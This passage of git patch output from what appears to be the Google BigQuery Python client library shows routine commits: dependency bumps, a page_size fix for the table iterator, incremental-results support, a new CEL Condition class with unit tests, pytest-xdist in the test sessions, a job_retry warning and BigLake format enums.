- if PANDAS_INSTALLED_VERSION >= "1.4": - assert df.dtypes["float64_col"].name == "Float64" - else: - assert df.dtypes["float64_col"].name == "string" + assert df.dtypes["float64_col"].name == "Float64" assert df.dtypes["int64_col"].name == "Int64" assert df.dtypes["string_col"].name == "string" diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index b846036ab..3588cfba6 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -4143,14 +4143,8 @@ def test_to_dataframe_w_dtypes_mapper(self): ) self.assertEqual(df.name.dtype.name, "string") - # While pyproject.toml lists pandas 1.1 as the lowest supported version of - # pandas, the pip resolver is not able to resolve pandas 1.1 and numpy - if hasattr(pandas, "Float64Dtype"): - self.assertEqual(list(df.miles), [1.77, 6.66, 2.0]) - self.assertEqual(df.miles.dtype.name, "Float64") - else: - self.assertEqual(list(df.miles), ["1.77", "6.66", "2.0"]) - self.assertEqual(df.miles.dtype.name, "string") + self.assertEqual(list(df.miles), [1.77, 6.66, 2.0]) + self.assertEqual(df.miles.dtype.name, "Float64") if hasattr(pandas, "ArrowDtype"): self.assertEqual( From c2343dd4a55cfe90bf450547eba45945e6d2ede6 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 3 Apr 2025 19:50:49 +0200 Subject: [PATCH 082/202] chore(deps): update dependency shapely to v2.1.0 (#2155) * chore(deps): update dependency shapely to v2.1.0 * pin Shapely===2.0.7 for python 3.9 --------- Co-authored-by: Lingqing Gan --- samples/geography/requirements.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 514e19d2c..5fe9005cc 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -34,7 +34,8 @@ pytz==2025.2 PyYAML==6.0.2 requests==2.32.3 rsa==4.9 -Shapely==2.0.7 +Shapely===2.0.7; python_version == '3.9' +Shapely==2.1.0; python_version >= '3.10' six==1.17.0 typing-extensions==4.13.0 
typing-inspect==0.9.0 From e89a707b162182ededbf94cc9a0f7594bc2be475 Mon Sep 17 00:00:00 2001 From: Chelsea Lin Date: Thu, 3 Apr 2025 11:45:08 -0700 Subject: [PATCH 083/202] fix: table iterator should not use bqstorage when page_size is not None (#2154) * fix: table iterator should not use bqstorage when page_size is not None * fix dbapi cursor tests --- google/cloud/bigquery/table.py | 11 +++++++++-- tests/unit/test_dbapi_cursor.py | 1 + tests/unit/test_table.py | 7 +++++++ 3 files changed, 17 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 099f7fd69..8a3b6151a 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1873,6 +1873,11 @@ def total_bytes_processed(self) -> Optional[int]: """total bytes processed from job statistics, if present.""" return self._total_bytes_processed + @property + def page_size(self) -> Optional[int]: + """The maximum number of rows in each page of results from this request, if present.""" + return self._page_size + def _is_almost_completely_cached(self): """Check if all results are completely cached. @@ -1924,7 +1929,7 @@ def _should_use_bqstorage(self, bqstorage_client, create_bqstorage_client): if self._is_almost_completely_cached(): return False - if self.max_results is not None: + if self.max_results is not None or self.page_size is not None: return False try: @@ -1994,7 +1999,9 @@ def _maybe_warn_max_results( bqstorage_client: The BigQuery Storage client intended to use for downloading result rows. 
""" - if bqstorage_client is not None and self.max_results is not None: + if bqstorage_client is not None and ( + self.max_results is not None or self.page_size is not None + ): warnings.warn( "Cannot use bqstorage_client if max_results is set, " "reverting to fetching data with the REST endpoint.", diff --git a/tests/unit/test_dbapi_cursor.py b/tests/unit/test_dbapi_cursor.py index 6fca4cec0..cba9030de 100644 --- a/tests/unit/test_dbapi_cursor.py +++ b/tests/unit/test_dbapi_cursor.py @@ -161,6 +161,7 @@ def _mock_rows( mock_rows, ) mock_rows.max_results = None + mock_rows.page_size = None type(mock_rows).job_id = mock.PropertyMock(return_value="test-job-id") type(mock_rows).location = mock.PropertyMock(return_value="test-location") type(mock_rows).num_dml_affected_rows = mock.PropertyMock( diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 3588cfba6..a9966f1ce 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -2693,6 +2693,13 @@ def test__should_use_bqstorage_returns_false_if_max_results_set(self): ) self.assertFalse(result) + def test__should_use_bqstorage_returns_false_if_page_size_set(self): + iterator = self._make_one(page_size=10, first_page_response=None) # not cached + result = iterator._should_use_bqstorage( + bqstorage_client=None, create_bqstorage_client=True + ) + self.assertFalse(result) + def test__should_use_bqstorage_returns_false_w_warning_if_missing_dependency(self): iterator = self._make_one(first_page_response=None) # not cached From ae632c5a88546d7c60c7780af7baa4f4c5e4e5a4 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 3 Apr 2025 23:20:01 +0200 Subject: [PATCH 084/202] chore(deps): update dependency typing-extensions to v4.13.1 (#2156) Co-authored-by: Lingqing Gan --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 5fe9005cc..37bcdf687 100644 --- 
a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -37,6 +37,6 @@ rsa==4.9 Shapely===2.0.7; python_version == '3.9' Shapely==2.1.0; python_version >= '3.10' six==1.17.0 -typing-extensions==4.13.0 +typing-extensions==4.13.1 typing-inspect==0.9.0 urllib3==2.3.0 From 22b80bba9d0bed319fd3102e567906c9b458dd02 Mon Sep 17 00:00:00 2001 From: shollyman Date: Thu, 10 Apr 2025 10:13:17 -0700 Subject: [PATCH 085/202] feat: add preview support for incremental results (#2145) * feat: add preview support for incremental results Plumbs support to enable incremental results. * fastpath allow * add fastquery test * lint * lint * blacken --- google/cloud/bigquery/_job_helpers.py | 1 + google/cloud/bigquery/job/query.py | 15 +++++++++++++++ tests/unit/job/test_query_config.py | 5 +++++ tests/unit/test__job_helpers.py | 12 ++++++++++++ 4 files changed, 33 insertions(+) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index a8373c356..9193f8184 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ b/google/cloud/bigquery/_job_helpers.py @@ -564,6 +564,7 @@ def _supported_by_jobs_query(request_body: Dict[str, Any]) -> bool: "maximumBytesBilled", "requestId", "createSession", + "writeIncrementalResults", } unsupported_keys = request_keys - keys_allowlist diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index a27c10530..f14039bc0 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -674,6 +674,21 @@ def write_disposition(self): def write_disposition(self, value): self._set_sub_prop("writeDisposition", value) + @property + def write_incremental_results(self) -> Optional[bool]: + """This is only supported for a SELECT query using a temporary table. + + If set, the query is allowed to write results incrementally to the temporary result + table. This may incur a performance penalty. This option cannot be used with Legacy SQL. 
+ + This feature is not generally available. + """ + return self._get_sub_prop("writeIncrementalResults") + + @write_incremental_results.setter + def write_incremental_results(self, value): + self._set_sub_prop("writeIncrementalResults", value) + @property def table_definitions(self): """Dict[str, google.cloud.bigquery.external_config.ExternalConfig]: diff --git a/tests/unit/job/test_query_config.py b/tests/unit/job/test_query_config.py index 7818236f4..e0878d067 100644 --- a/tests/unit/job/test_query_config.py +++ b/tests/unit/job/test_query_config.py @@ -167,6 +167,11 @@ def test_connection_properties(self): self.assertEqual(config.connection_properties[1].key, "time_zone") self.assertEqual(config.connection_properties[1].value, "America/Chicago") + def test_incremental_results(self): + config = self._get_target_class()() + config.write_incremental_results = True + self.assertEqual(config.write_incremental_results, True) + def test_create_session(self): config = self._get_target_class()() self.assertIsNone(config.create_session) diff --git a/tests/unit/test__job_helpers.py b/tests/unit/test__job_helpers.py index 96914d9f9..4fa093c69 100644 --- a/tests/unit/test__job_helpers.py +++ b/tests/unit/test__job_helpers.py @@ -194,6 +194,13 @@ def make_query_response( make_query_request({"maximumBytesBilled": "987654"}), id="job_config-with-maximum_bytes_billed", ), + pytest.param( + job_query.QueryJobConfig( + write_incremental_results=True, + ), + make_query_request({"writeIncrementalResults": True}), + id="job_config-with-incremental-results", + ), ), ) def test__to_query_request(job_config, expected): @@ -1141,6 +1148,11 @@ def test_make_job_id_w_job_id_overrides_prefix(): False, id="priority=BATCH", ), + pytest.param( + job_query.QueryJobConfig(write_incremental_results=True), + True, + id="write_incremental_results", + ), ), ) def test_supported_by_jobs_query_from_queryjobconfig( From b162288eb3be5a8bd23b05070eae52fe6c813b1b Mon Sep 17 00:00:00 2001 From: 
"gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Thu, 10 Apr 2025 10:37:54 -0700 Subject: [PATCH 086/202] chore(python): remove .gitignore from templates (#2160) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(python): remove .gitignore from templates Source-Link: https://github.com/googleapis/synthtool/commit/419d94cdddd0d859ac6743ffebd177693c8a027f Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:a7aef70df5f13313ddc027409fc8f3151422ec2a57ac8730fce8fa75c060d5bb * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * remove replacement in owlbot.py --------- Co-authored-by: Owl Bot Co-authored-by: Anthonios Partheniou --- .github/.OwlBot.lock.yaml | 4 ++-- owlbot.py | 8 -------- 2 files changed, 2 insertions(+), 10 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 9d743afe8..51b21a62b 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. 
docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:5581906b957284864632cde4e9c51d1cc66b0094990b27e689132fe5cd036046 -# created: 2025-03-07 + digest: sha256:a7aef70df5f13313ddc027409fc8f3151422ec2a57ac8730fce8fa75c060d5bb +# created: 2025-04-10T17:00:10.042601326Z diff --git a/owlbot.py b/owlbot.py index fceeaa1b6..8cfa2b097 100644 --- a/owlbot.py +++ b/owlbot.py @@ -130,14 +130,6 @@ 'ALL_VERSIONS = ["3.9", "3.10", "3.11", "3.12", "3.13"]', ) - -# ---------------------------------------------------------------------------- -# pytype-related changes -# ---------------------------------------------------------------------------- - -# Add .pytype to .gitignore -s.replace(".gitignore", r"\.pytest_cache", "\\g<0>\n.pytype") - s.shell.run(["nox", "-s", "blacken"], hide_output=False) for noxfile in REPO_ROOT.glob("samples/**/noxfile.py"): s.shell.run(["nox", "-s", "blacken"], cwd=noxfile.parent, hide_output=False) From 1cabacbcec17a14d80e62627129cdf26696acabe Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 11 Apr 2025 15:23:01 -0400 Subject: [PATCH 087/202] test: adds pytest-xdist to speed up processing of CI/CD checks (#2153) * experimentation using pytest-xdist * adds pytest-xdist to nox system session for experimentation * adds pytest-xdist install AND -n=auto argument * updates sample noxfiles * updates pytest version in requirements-test.txt files * Update samples/notebooks/requirements-test.txt * Update samples/notebooks/requirements-test.txt --- noxfile.py | 23 ++++++++++++++++++++--- samples/desktopapp/requirements-test.txt | 1 + samples/geography/requirements-test.txt | 1 + samples/magics/requirements-test.txt | 1 + samples/notebooks/requirements-test.txt | 1 + samples/snippets/requirements-test.txt | 1 + 6 files changed, 25 insertions(+), 3 deletions(-) diff --git a/noxfile.py b/noxfile.py index 1b118836b..c2b4bbb50 100644 --- a/noxfile.py +++ b/noxfile.py @@ -98,6 +98,7 @@ def default(session, install_extras=True): 
"pytest", "google-cloud-testutils", "pytest-cov", + "pytest-xdist", "freezegun", "-c", constraints_path, @@ -129,6 +130,7 @@ def default(session, install_extras=True): # Run py.test against the unit tests. session.run( "py.test", + "-n=auto", "--quiet", "-W default::PendingDeprecationWarning", "--cov=google/cloud/bigquery", @@ -224,7 +226,12 @@ def system(session): # Install all test dependencies, then install local packages in place. session.install( - "pytest", "psutil", "google-cloud-testutils", "-c", constraints_path + "pytest", + "psutil", + "pytest-xdist", + "google-cloud-testutils", + "-c", + constraints_path, ) if os.environ.get("GOOGLE_API_USE_CLIENT_CERTIFICATE", "") == "true": # mTLS test requires pyopenssl and latest google-cloud-storage @@ -257,6 +264,7 @@ def system(session): # Run py.test against the system tests. session.run( "py.test", + "-n=auto", "--quiet", "-W default::PendingDeprecationWarning", os.path.join("tests", "system"), @@ -310,7 +318,9 @@ def snippets(session): ) # Install all test dependencies, then install local packages in place. - session.install("pytest", "google-cloud-testutils", "-c", constraints_path) + session.install( + "pytest", "pytest-xdist", "google-cloud-testutils", "-c", constraints_path + ) session.install("google-cloud-storage", "-c", constraints_path) session.install("grpcio", "-c", constraints_path) @@ -326,9 +336,12 @@ def snippets(session): # Run py.test against the snippets tests. # Skip tests in samples/snippets, as those are run in a different session # using the nox config from that directory. 
- session.run("py.test", os.path.join("docs", "snippets.py"), *session.posargs) + session.run( + "py.test", "-n=auto", os.path.join("docs", "snippets.py"), *session.posargs + ) session.run( "py.test", + "-n=auto", "samples", "-W default::PendingDeprecationWarning", "--ignore=samples/desktopapp", @@ -393,6 +406,7 @@ def prerelease_deps(session): "google-cloud-testutils", "psutil", "pytest", + "pytest-xdist", "pytest-cov", ) @@ -439,18 +453,21 @@ def prerelease_deps(session): # Run all tests, except a few samples tests which require extra dependencies. session.run( "py.test", + "-n=auto", "tests/unit", "-W default::PendingDeprecationWarning", ) session.run( "py.test", + "-n=auto", "tests/system", "-W default::PendingDeprecationWarning", ) session.run( "py.test", + "-n=auto", "samples/tests", "-W default::PendingDeprecationWarning", ) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index c8290d33f..183230cf4 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,3 +1,4 @@ google-cloud-testutils==1.6.0 pytest==8.3.5 mock==5.2.0 +pytest-xdist==3.6.1 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index 5d20a4554..7b01ce8ac 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,2 +1,3 @@ pytest==8.3.5 mock==5.2.0 +pytest-xdist==3.6.1 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index c8290d33f..183230cf4 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,3 +1,4 @@ google-cloud-testutils==1.6.0 pytest==8.3.5 mock==5.2.0 +pytest-xdist==3.6.1 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index c8290d33f..183230cf4 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,3 +1,4 @@ 
google-cloud-testutils==1.6.0 pytest==8.3.5 mock==5.2.0 +pytest-xdist==3.6.1 diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index 197b89187..0cf0bb6b4 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -2,3 +2,4 @@ google-cloud-testutils==1.6.0 pytest==8.3.5 mock==5.2.0 +pytest-xdist==3.6.1 From a69d6b796d2edb6ba453980c9553bc9b206c5a6e Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 16 Apr 2025 05:20:30 -0400 Subject: [PATCH 088/202] feat: adds condition class and assoc. unit tests (#2159) * feat: adds condition class and assoc. unit tests * Updates two test cases for empty string --- google/cloud/bigquery/dataset.py | 93 ++++++++++++++++++- tests/unit/test_dataset.py | 155 +++++++++++++++++++++++++++++++ 2 files changed, 246 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index 15a11fb40..cc14598fe 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -19,6 +19,7 @@ import copy import typing +from typing import Optional, List, Dict, Any, Union import google.cloud._helpers # type: ignore @@ -29,8 +30,6 @@ from google.cloud.bigquery.encryption_configuration import EncryptionConfiguration from google.cloud.bigquery import external_config -from typing import Optional, List, Dict, Any, Union - def _get_table_reference(self, table_id: str) -> TableReference: """Constructs a TableReference. @@ -1074,3 +1073,93 @@ def reference(self): model = _get_model_reference routine = _get_routine_reference + + +class Condition(object): + """Represents a textual expression in the Common Expression Language (CEL) syntax. + + Typically used for filtering or policy rules, such as in IAM Conditions + or BigQuery row/column access policies. 
+ + See: + https://cloud.google.com/iam/docs/reference/rest/Shared.Types/Expr + https://github.com/google/cel-spec + + Args: + expression (str): + The condition expression string using CEL syntax. This is required. + Example: ``resource.type == "compute.googleapis.com/Instance"`` + title (Optional[str]): + An optional title for the condition, providing a short summary. + Example: ``"Request is for a GCE instance"`` + description (Optional[str]): + An optional description of the condition, providing a detailed explanation. + Example: ``"This condition checks whether the resource is a GCE instance."`` + """ + + def __init__( + self, + expression: str, + title: Optional[str] = None, + description: Optional[str] = None, + ): + self._properties: Dict[str, Any] = {} + # Use setters to initialize properties, which also handle validation + self.expression = expression + self.title = title + self.description = description + + @property + def title(self) -> Optional[str]: + """Optional[str]: The title for the condition.""" + return self._properties.get("title") + + @title.setter + def title(self, value: Optional[str]): + if value is not None and not isinstance(value, str): + raise ValueError("Pass a string for title, or None") + self._properties["title"] = value + + @property + def description(self) -> Optional[str]: + """Optional[str]: The description for the condition.""" + return self._properties.get("description") + + @description.setter + def description(self, value: Optional[str]): + if value is not None and not isinstance(value, str): + raise ValueError("Pass a string for description, or None") + self._properties["description"] = value + + @property + def expression(self) -> str: + """str: The expression string for the condition.""" + + # Cast assumes expression is always set due to __init__ validation + return typing.cast(str, self._properties.get("expression")) + + @expression.setter + def expression(self, value: str): + if not isinstance(value, str): + raise 
ValueError("Pass a non-empty string for expression") + if not value: + raise ValueError("expression cannot be an empty string") + self._properties["expression"] = value + + def to_api_repr(self) -> Dict[str, Any]: + """Construct the API resource representation of this Condition.""" + return self._properties + + @classmethod + def from_api_repr(cls, resource: Dict[str, Any]) -> "Condition": + """Factory: construct a Condition instance given its API representation.""" + + # Ensure required fields are present in the resource if necessary + if "expression" not in resource: + raise ValueError("API representation missing required 'expression' field.") + + return cls( + expression=resource["expression"], + title=resource.get("title"), + description=resource.get("description"), + ) diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index 8ab8dffec..036e22458 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -19,6 +19,7 @@ import pytest from google.cloud.bigquery.dataset import ( AccessEntry, + Condition, Dataset, DatasetReference, Table, @@ -1228,3 +1229,157 @@ def test_table(self): self.assertEqual(table.table_id, "table_id") self.assertEqual(table.dataset_id, dataset_id) self.assertEqual(table.project, project) + + +class TestCondition: + EXPRESSION = 'resource.name.startsWith("projects/my-project/instances/")' + TITLE = "Instance Access" + DESCRIPTION = "Access to instances in my-project" + + @pytest.fixture + def condition_instance(self): + """Provides a Condition instance for tests.""" + return Condition( + expression=self.EXPRESSION, + title=self.TITLE, + description=self.DESCRIPTION, + ) + + @pytest.fixture + def condition_api_repr(self): + """Provides the API representation for the test Condition.""" + return { + "expression": self.EXPRESSION, + "title": self.TITLE, + "description": self.DESCRIPTION, + } + + # --- Basic Functionality Tests --- + + def test_constructor_and_getters_full(self, condition_instance): + """Test 
initialization with all arguments and subsequent attribute access.""" + assert condition_instance.expression == self.EXPRESSION + assert condition_instance.title == self.TITLE + assert condition_instance.description == self.DESCRIPTION + + def test_constructor_and_getters_minimal(self): + """Test initialization with only the required expression.""" + condition = Condition(expression=self.EXPRESSION) + assert condition.expression == self.EXPRESSION + assert condition.title is None + assert condition.description is None + + def test_setters(self, condition_instance): + """Test setting attributes after initialization.""" + new_title = "New Title" + new_desc = "New Description" + new_expr = "request.time < timestamp('2024-01-01T00:00:00Z')" + + condition_instance.title = new_title + assert condition_instance.title == new_title + + condition_instance.description = new_desc + assert condition_instance.description == new_desc + + condition_instance.expression = new_expr + assert condition_instance.expression == new_expr + + # Test setting title and description to empty strings + condition_instance.title = "" + assert condition_instance.title == "" + + condition_instance.description = "" + assert condition_instance.description == "" + + # Test setting optional fields back to None + condition_instance.title = None + assert condition_instance.title is None + condition_instance.description = None + assert condition_instance.description is None + + # --- API Representation Tests --- + + def test_to_api_repr_full(self, condition_instance, condition_api_repr): + """Test converting a fully populated Condition to API representation.""" + api_repr = condition_instance.to_api_repr() + assert api_repr == condition_api_repr + + def test_to_api_repr_minimal(self): + """Test converting a minimally populated Condition to API representation.""" + condition = Condition(expression=self.EXPRESSION) + expected_api_repr = { + "expression": self.EXPRESSION, + "title": None, + "description": 
None, + } + api_repr = condition.to_api_repr() + assert api_repr == expected_api_repr + + def test_from_api_repr_full(self, condition_api_repr): + """Test creating a Condition from a full API representation.""" + condition = Condition.from_api_repr(condition_api_repr) + assert condition.expression == self.EXPRESSION + assert condition.title == self.TITLE + assert condition.description == self.DESCRIPTION + + def test_from_api_repr_minimal(self): + """Test creating a Condition from a minimal API representation.""" + minimal_repr = {"expression": self.EXPRESSION} + condition = Condition.from_api_repr(minimal_repr) + assert condition.expression == self.EXPRESSION + assert condition.title is None + assert condition.description is None + + def test_from_api_repr_with_extra_fields(self): + """Test creating a Condition from an API repr with unexpected fields.""" + api_repr = { + "expression": self.EXPRESSION, + "title": self.TITLE, + "unexpected_field": "some_value", + } + condition = Condition.from_api_repr(api_repr) + assert condition.expression == self.EXPRESSION + assert condition.title == self.TITLE + assert condition.description is None + # Check that the extra field didn't get added to internal properties + assert "unexpected_field" not in condition._properties + + # # --- Validation Tests --- + + @pytest.mark.parametrize( + "kwargs, error_msg", + [ + ({"expression": None}, "Pass a non-empty string for expression"), # type: ignore + ({"expression": ""}, "expression cannot be an empty string"), + ({"expression": 123}, "Pass a non-empty string for expression"), # type: ignore + ({"expression": EXPRESSION, "title": 123}, "Pass a string for title, or None"), # type: ignore + ({"expression": EXPRESSION, "description": False}, "Pass a string for description, or None"), # type: ignore + ], + ) + def test_validation_init(self, kwargs, error_msg): + """Test validation during __init__.""" + with pytest.raises(ValueError, match=error_msg): + Condition(**kwargs) + + 
@pytest.mark.parametrize( + "attribute, value, error_msg", + [ + ("expression", None, "Pass a non-empty string for expression"), # type: ignore + ("expression", "", "expression cannot be an empty string"), + ("expression", 123, "Pass a non-empty string for expression"), # type: ignore + ("title", 123, "Pass a string for title, or None"), # type: ignore + ("description", [], "Pass a string for description, or None"), # type: ignore + ], + ) + def test_validation_setters(self, condition_instance, attribute, value, error_msg): + """Test validation via setters.""" + with pytest.raises(ValueError, match=error_msg): + setattr(condition_instance, attribute, value) + + def test_validation_expression_required_from_api(self): + """Test ValueError is raised if expression is missing in from_api_repr.""" + api_repr = {"title": self.TITLE} + with pytest.raises( + ValueError, match="API representation missing required 'expression' field." + ): + Condition.from_api_repr(api_repr) From ca1798aaee2d5905fe688d3097f8ee5c989da333 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Thu, 24 Apr 2025 15:46:59 -0500 Subject: [PATCH 089/202] fix: `query()` now warns when `job_id` is set and the default `job_retry` is ignored (#2167) * fix: `query()` now warns when `job_id` is set and the default `job_retry` is ignored * Update google/cloud/bigquery/client.py * allow None for job_retry in code path that calls jobs.query from client.query * allow None for job_retry in code path that calls jobs.query from client.query * Update tests/unit/test_job_retry.py --- google/cloud/bigquery/_job_helpers.py | 42 ++++++++++++++++++++++++++- google/cloud/bigquery/client.py | 15 ++-------- tests/unit/test_job_retry.py | 18 ++++++++---- 3 files changed, 57 insertions(+), 18 deletions(-) diff --git a/google/cloud/bigquery/_job_helpers.py b/google/cloud/bigquery/_job_helpers.py index 9193f8184..4a884ada5 100644 --- a/google/cloud/bigquery/_job_helpers.py +++ 
b/google/cloud/bigquery/_job_helpers.py @@ -39,7 +39,9 @@ import functools import os import uuid +import textwrap from typing import Any, Dict, Optional, TYPE_CHECKING, Union +import warnings import google.api_core.exceptions as core_exceptions from google.api_core import retry as retries @@ -198,6 +200,44 @@ def _validate_job_config(request_body: Dict[str, Any], invalid_key: str): raise ValueError(f"got unexpected key {repr(invalid_key)} in job_config") +def validate_job_retry(job_id: Optional[str], job_retry: Optional[retries.Retry]): + """Catch common mistakes, such as setting a job_id and job_retry at the same + time. + """ + if job_id is not None and job_retry is not None: + # TODO(tswast): To avoid breaking changes but still allow a default + # query job retry, we currently only raise if they explicitly set a + # job_retry other than the default. In a future version, we may want to + # avoid this check for DEFAULT_JOB_RETRY and always raise. + if job_retry is not google.cloud.bigquery.retry.DEFAULT_JOB_RETRY: + raise TypeError( + textwrap.dedent( + """ + `job_retry` was provided, but the returned job is + not retryable, because a custom `job_id` was + provided. To customize the job ID and allow for job + retries, set job_id_prefix, instead. + """ + ).strip() + ) + else: + warnings.warn( + textwrap.dedent( + """ + job_retry must be explicitly set to None if job_id is set. + BigQuery cannot retry a failed job by using the exact + same ID. Setting job_id without explicitly disabling + job_retry will raise an error in the future. To avoid this + warning, either use job_id_prefix instead (preferred) or + set job_retry=None. 
+ """ + ).strip(), + category=FutureWarning, + # user code -> client.query / client.query_and_wait -> validate_job_retry + stacklevel=3, + ) + + def _to_query_request( job_config: Optional[job.QueryJobConfig] = None, *, @@ -308,7 +348,7 @@ def query_jobs_query( project: str, retry: retries.Retry, timeout: Optional[float], - job_retry: retries.Retry, + job_retry: Optional[retries.Retry], ) -> job.QueryJob: """Initiate a query using jobs.query with jobCreationMode=JOB_CREATION_REQUIRED. diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index 8bbdd6c32..e7cafc47e 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -3388,7 +3388,7 @@ def query( project: Optional[str] = None, retry: retries.Retry = DEFAULT_RETRY, timeout: TimeoutType = DEFAULT_TIMEOUT, - job_retry: retries.Retry = DEFAULT_JOB_RETRY, + job_retry: Optional[retries.Retry] = DEFAULT_JOB_RETRY, api_method: Union[str, enums.QueryApiMethod] = enums.QueryApiMethod.INSERT, ) -> job.QueryJob: """Run a SQL query. @@ -3455,18 +3455,9 @@ def query( class, or if both ``job_id`` and non-``None`` non-default ``job_retry`` are provided. """ - job_id_given = job_id is not None - if ( - job_id_given - and job_retry is not None - and job_retry is not DEFAULT_JOB_RETRY - ): - raise TypeError( - "`job_retry` was provided, but the returned job is" - " not retryable, because a custom `job_id` was" - " provided." - ) + _job_helpers.validate_job_retry(job_id, job_retry) + job_id_given = job_id is not None if job_id_given and api_method == enums.QueryApiMethod.QUERY: raise TypeError( "`job_id` was provided, but the 'QUERY' `api_method` was requested." 
diff --git a/tests/unit/test_job_retry.py b/tests/unit/test_job_retry.py index 958986052..7144c640b 100644 --- a/tests/unit/test_job_retry.py +++ b/tests/unit/test_job_retry.py @@ -511,26 +511,34 @@ def api_request(method, path, query_params=None, data=None, **kw): def test_raises_on_job_retry_on_query_with_non_retryable_jobs(client): with pytest.raises( TypeError, - match=re.escape( + match=( "`job_retry` was provided, but the returned job is" " not retryable, because a custom `job_id` was" " provided." - ), + ).replace(" ", r"\s"), ): client.query("select 42", job_id=42, job_retry=google.api_core.retry.Retry()) def test_raises_on_job_retry_on_result_with_non_retryable_jobs(client): client._connection = make_connection({}) - job = client.query("select 42", job_id=42) + + with pytest.warns( + FutureWarning, + match=re.escape("job_retry must be explicitly set to None if job_id is set."), + ): + # Implicitly providing a job_retry is a warning and will be an error in the future. + job = client.query("select 42", job_id=42) + with pytest.raises( TypeError, - match=re.escape( + match=( "`job_retry` was provided, but this job is" " not retryable, because a custom `job_id` was" " provided to the query that created this job." - ), + ).replace(" ", r"\s"), ): + # Explicitly providing a job_retry is an error. job.result(job_retry=google.api_core.retry.Retry()) From a1c8e9aaf60986924868d54a0ab0334e77002a39 Mon Sep 17 00:00:00 2001 From: shollyman Date: Fri, 25 Apr 2025 10:29:54 -0700 Subject: [PATCH 090/202] feat: support BigLakeConfiguration (managed Iceberg tables) (#2162) * feat: support BigLakeConfiguration (managed Iceberg tables) This PR adds the BigLakeConfiguration class to tables, and the necessary property mappings from Table. It also adds some utility enums (BigLakeFileFormat, BigLakeTableFormat) to more easily communicate available values for configuration. 
--- google/cloud/bigquery/enums.py | 16 ++++ google/cloud/bigquery/table.py | 150 +++++++++++++++++++++++++++++++ tests/unit/test_table.py | 160 +++++++++++++++++++++++++++++++++ 3 files changed, 326 insertions(+) diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index 5519bc989..b32fc8200 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -387,3 +387,19 @@ def _generate_next_value_(name, start, count, last_values): ROUNDING_MODE_UNSPECIFIED = enum.auto() ROUND_HALF_AWAY_FROM_ZERO = enum.auto() ROUND_HALF_EVEN = enum.auto() + + +class BigLakeFileFormat(object): + FILE_FORMAT_UNSPECIFIED = "FILE_FORMAT_UNSPECIFIED" + """The default unspecified value.""" + + PARQUET = "PARQUET" + """Apache Parquet format.""" + + +class BigLakeTableFormat(object): + TABLE_FORMAT_UNSPECIFIED = "TABLE_FORMAT_UNSPECIFIED" + """The default unspecified value.""" + + ICEBERG = "ICEBERG" + """Apache Iceberg format.""" diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 8a3b6151a..503ca4e71 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -380,6 +380,7 @@ class Table(_TableBase): _PROPERTY_TO_API_FIELD: Dict[str, Any] = { **_TableBase._PROPERTY_TO_API_FIELD, + "biglake_configuration": 